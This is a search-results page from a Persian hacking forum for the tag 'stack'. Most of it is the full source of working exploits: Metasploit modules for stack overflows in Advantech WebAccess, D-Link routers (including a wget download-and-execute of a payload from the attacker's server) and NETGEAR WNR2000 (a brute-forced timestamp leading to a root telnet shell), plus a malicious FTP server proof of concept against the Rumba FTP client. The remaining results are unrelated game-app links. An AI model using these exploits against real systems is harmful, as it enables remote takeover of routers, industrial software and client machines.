رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'stack'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

7 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. Soft-Apple

    بازی AA Free 3D: Stack The Stickman dots AA Free 3D: Stack The Stickman dots on the App Store
  3. Hacking

    # Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH # Date: 29-10-2016 # Exploit Author: Umit Aksu # Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx # Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307 # Version: 4.x # Tested on: Windows 7 # CVE : CVE-2016-5764 1. Description Micro Focus Rumba FTP Client 4.x cannt handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution on connected client. 2. Proof of Concept The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH. 3. PoC Code ------------------- Server.py -------------------------- import socket import sys import time # IP Address IP = '127.0.0.1' \ '' # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Bind the socket to the port server_address = (IP,21) print "Starting up on %s port %s" % server_address sock.bind(server_address) # Listen for incoming connections sock.listen(1) # Wait for incoming connection while True: print "Waiting for a connection" connection, client_address = sock.accept() try: print "Connection from " + str(client_address) # Receive the data in small chunks and restransmit it connection.send("220 Welcome\r\n") while(True): data = connection.recv(16) print "received %s" % data if "USER" in data: print "Sending 331" connection.send("331 Please specify the password.\r\n") if "PASS" in data: print "Sending 227" connection.send("230 Login successful.\n\n") if "PWD" in data: print "Sending 257" # 77A632E2 add esp,908 pop pop pop ret # THIS IS THE PART WHERE THE OVERFLOW HAPPENS connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n") if "TYPE A" in data: print "Sending 200 Switching to ASCII mode." connection.send("200 Switching to ASCII mode.\r\n") if "TYPE I" in data: print "Sending 200 Switching to Binary mode." connection.send("200 200 Switching to Binary mode.\r\n") if "SYST" in data: print "Sending 215" connection.send("215 UNIX Type: L8\r\n") if "SIZE" in data: print "Sending 200" connection.send("200 Switching to Binary mode. \r\n") if "FEAT" in data: print "Sending 211-Features" connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n") if "CWD" in data: print "Sending 250 Directory successfully changed." connection.send("250 Directory successfully changed.\r\n") if "PASV" in str(data): print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n" connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n") # Listen on new socket for connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Socket created' #Bind socket to local host and port try: s.bind((IP, 28599)) except socket.error as msg: print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] sys.exit() print 'Socket bind complete for PASV on port 28599' #Start listening on socket s.listen(10) print 'Socket now listening on 28599' #now keep talking with the client #wait to accept a connection - blocking call conn, addr = s.accept() print 'Connected with ' + addr[0] + ':' + str(addr[1]) time.sleep(1) print "Sending dir list" connection.send("150 Here comes the directory listing.\r\n") conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n") # Send ok to ftp client connection.send("226 Directory send OK.\r\n") # close the connection s.close() conn.close() break if "EXIT" in str(data): print "REC" connection.send("Have a nice day!\r\n") break finally: connection.close()
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' # Payload working status: # MIPS: # - all valid payloads working (the ones that we are able to send without null bytes) # ARM: # - inline rev/bind shell works (bind... meh sometimes) # - stager rev/bind shell FAIL # - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow', 'Description' => %q{ Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and then copies them into the stack. This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and this vulnerability is present in both MIPS and ARM devices. The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a few load and store instructions. Because of this the payloads have to be sent unencoded, which can cause them to fail, although the bind shell seems to work well. For the ARM devices, the inline reverse tcp seems to work best. Check the reference links to see the vulnerable firmware versions. }, 'Author' => [ 'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'References' => [ ['CVE', '2016-6563'], ['US-CERT-VU', '677427'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38'] ], 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target) 'Targets' => [ [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]', { 'Offset' => 3072, 'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers 'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so 'FirstGadget' => 0x4EA1C, # see comments below for gadget information 'SecondGadget' => 0x2468C, 'ThirdGadget' => 0x41f3c, 'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128 'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp 'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop) 'Arch' => ARCH_MIPSBE, 'Payload' => { 'BadChars' => "\x00", 'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled }, } ], [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]', { 'Offset' => 1024, 'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well) 'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so 'FirstGadget' => 0x18298, # see comments below for gadget information 'SecondGadget' => 0x40CB8, 'Arch' => ARCH_ARMLE, } ], ], 'DisclosureDate' => 'Nov 7 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']), OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']), OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/HNAP1/', 'method' => 'POST', 'Content-Type' => 'text/xml', 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' } }) if res && res.code == 500 return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def calc_encode_addr (offset, big_endian = true) if big_endian [(target['LibcBase'] + offset).to_s(16)].pack('H*') else [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse end end def prepare_shellcode_arm (cmd) #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers #first_gadget (pops system() address into r3, and second_gadget into PC): #.text:00018298 LDMFD SP!, {R3,PC} #second_gadget (puts the stack pointer into r0 and calls system() at r3): #.text:00040CB8 MOV R0, SP #.text:00040CBC BLX R3 #system() (Executes argument in r0 (our stack pointer) #.text:0005A270 system #The final payload will be: #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command shellcode = rand_text_alpha(target['Offset']) + # filler "\xff\xff\xff\xff" + # n integer overwrite (see advisory) rand_text_alpha(16) + # moar filler rand_text_alpha(4) + # r11 calc_encode_addr(target['FirstGadget'], false) + # first_gadget calc_encode_addr(target['System'], false) + # system() address calc_encode_addr(target['SecondGadget'], false) + # second_gadget cmd # our command end def prepare_shellcode_mips #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers #<sleep> is at 56DF0 #first gadget - execute sleep and call second_gadget #.text:0004EA1C move $t9, $s0 <- sleep() #.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget #.text:0004EA24 li $a0, 2 <- arg for sleep() #.text:0004EA28 lw $s0, 0x20+var_8($sp) #.text:0004EA2C li $a1, 1 #.text:0004EA30 move $a2, $zero #.text:0004EA34 jr $t9 #.text:0004EA38 addiu $sp, 0x20 #second gadget - put stack pointer in a1: #.text:0002468C addiu $s1, $sp, 0x58 #.text:00024690 li $s0, 0x44 #.text:00024694 move $a2, $s0 #.text:00024698 move $a1, $s1 #.text:0002469C move $t9, $s4 #.text:000246A0 jalr $t9 #.text:000246A4 move $a0, $s2 #third gadget - call $a1 (stack pointer): #.text:00041F3C move $t9, $a1 #.text:00041F40 move $a1, $a2 #.text:00041F44 addiu $a0, 8 #.text:00041F48 jr $t9 #.text:00041F4C nop #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer. #prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128 #prep_shellcode_2: 03a0f809 jalr sp #branch_delay: 2084f830 addi a0,a0,-2000 #The final payload will be: #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay shellcode = payload.encoded + # exploit rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler calc_encode_addr(target['Sleep']) + # s0 rand_text_alpha(4) + # s1 rand_text_alpha(4) + # s2 rand_text_alpha(4) + # s3 calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget) calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget) rand_text_alpha(0x1c) + # filler calc_encode_addr(target['SecondGadget']) + # second_gadget rand_text_alpha(0x58) + # filler target['PrepShellcode1'] + # exploit prep target['PrepShellcode2'] + # exploit prep target['BranchDelay'] # exploit prep end def send_payload (payload) begin # the payload can go in the Action, Username, LoginPassword or Captcha XML tag body = %{ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <Login xmlns="http://purenetworks.com/HNAP1/"> <Action>something</Action> <Username>Admin</Username> <LoginPassword></LoginPassword> <Captcha>#{payload}</Captcha> </Login> </soap:Body> </soap:Envelope> } res = send_request_cgi({ 'uri' => '/HNAP1/', 'method' => 'POST', 'ctype' => 'text/xml', 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }, 'data' => body }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{peer} - A request came in, but the payload wasn't ready yet!") return end print_status("#{peer} - Sending the payload to the device...") @elf_sent = true send_response(cli, @pl) end def exploit print_status("#{peer} - Attempting to exploit #{target.name}") if target == targets[0] send_payload(prepare_shellcode_mips) else downfile = rand_text_alpha(8+rand(8)) @pl = generate_payload_exe @elf_sent = false resource_uri = '/' + downfile #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{peer} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore print_status("#{peer} - Asking the device to download and execute #{service_url}") filename = rand_text_alpha_lower(rand(8) + 2) cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &" shellcode = prepare_shellcode_arm(cmd) print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.") counter = 0.00 while (not @elf_sent) if counter % 50.00 == 0 && counter != 0.00 print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") end send_payload(shellcode) sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine counter += 1 end print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") end end end
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'time' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CRand def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow', 'Description' => %q{ The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an unauthenticated attacker has to brute force it. Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but it is guaranteed that it can be bruteforced. This module implements both modes, and it works very reliably. It has been tested with the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware revisions v4 and v3, but this has not been tested - with these routers it might be necessary to adjust the LibcBase variable as well as the gadget addresses. }, 'Author' => [ 'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'References' => [ ['CVE', '2016-10174'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'], ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability'] ], 'Targets' => [ [ 'NETGEAR WNR2000v5', { 'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so) 'SystemOffset' => 0x547D0, 'GadgetOffset' => 0x2462C, #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()): #LOAD:0002462C addiu $a0, $sp, 0x40+arg_0 #LOAD:00024630 move $t9, $s0 #LOAD:00024634 jalr $t9 'Payload' => { 'BadChars' => "\x00\x25\x26", 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, } ], ], 'Privileged' => true, 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DisclosureDate' => 'Dec 20 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']), OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']), ], self.class) register_advanced_options( [ OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]), OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200]) ], self.class) end def check res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['WWW-Authenticate'] auth = res.headers['WWW-Authenticate'] if auth =~ /WNR2000v5/ return Exploit::CheckCode::Detected elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ return Exploit::CheckCode::Unknown end end Exploit::CheckCode::Safe end def uri_encode (str) "%" + str.scan(/.{2}|.+/).join("%") end def calc_address (libc_base, offset) addr = (libc_base + offset).to_s(16) uri_encode(addr) end def get_current_time res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res['Date'] date = res['Date'] return Time.parse(date).strftime('%s').to_i end end def get_auth_timestamp res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) if res && res.code == 401 # try again, might fail the first time res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) end if res && res.code == 200 if res.body =~ /timestamp=([0-9]{8})/ $1.to_i end end end # Do some crazyness to force Ruby to cast to a single-precision float and # back to an integer. # This emulates the behaviour of the soft-fp library and the float cast # which is done at the end of Netgear's timestamp generator. def ieee754_round (number) [number].pack('f').unpack('f*')[0].to_i end # This is the actual algorithm used in the get_timestamp function in # the Netgear firmware. def get_timestamp(time) srandom_r time t0 = random_r t1 = 0x17dc65df; hi = (t0 * t1) >> 32; t2 = t0 >> 31; t3 = hi >> 23; t3 = t3 - t2; t4 = t3 * 0x55d4a80; t0 = t0 - t4; t0 = t0 + 0x989680; ieee754_round(t0) end def get_payload rand_text_alpha(36) + # filler_1 calc_address(target['LibcBase'], target['SystemOffset']) + # s0 rand_text_alpha(12) + # s1, s2 and s3 calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget rand_text_alpha(0x40) + # filler_2 "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload end def send_req(timestamp) begin uri_str = (timestamp == nil ? \ "/apply_noauth.cgi?/lang_check.html" : \ "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}") res = send_request_raw({ 'uri' => uri_str, 'method' => 'POST', 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, 'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}" }) rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e return end end def exploit # 1: try to see if the default admin username and password are set timestamp = get_auth_timestamp # 2: now we try two things at once: # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before) print_status("#{peer} - Trying the easy way out first") send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if not sock.nil? print_good("#{peer} - Success, shell incoming!") return handler(sock) end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock end print_bad("#{peer} - Well that didn't work... let's do it the hard way.") # no shell? let's just go on and bruteforce the timestamp # 3: get the current date from the router and parse it end_time = get_current_time if end_time.nil? fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") end if end_time <= datastore['TIME_OFFSET'] start_time = 0 else start_time = end_time - datastore['TIME_OFFSET'] end end_time += datastore['TIME_SURPLUS'] if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i end print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.") print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).") # 2: work back from the current router time minus datastore['TIME_OFFSET'] while true for time in end_time.downto(start_time) timestamp = get_timestamp(time) sleep 0.1 if time % 400 == 0 print_status("#{peer} - Still working, trying time #{time}") end send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if sock.nil? next end print_status("#{peer} - Success, shell incoming!") return handler(sock) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock next end end end_time = start_time start_time -= datastore['TIME_OFFSET'] if start_time < 0 if end_time <= datastore['TIME_OFFSET'] fail_with(Failure::Unknown, "#{peer} - Exploit failed.") end start_time = 0 end print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}") # let the router clear the buffers a bit... sleep 30 end end end
  6. Soft-Android

    بازی Stack Stack – Android-Apps auf Google Play
  7. Soft-Apple

    بازی Stack Stack on the App Store
×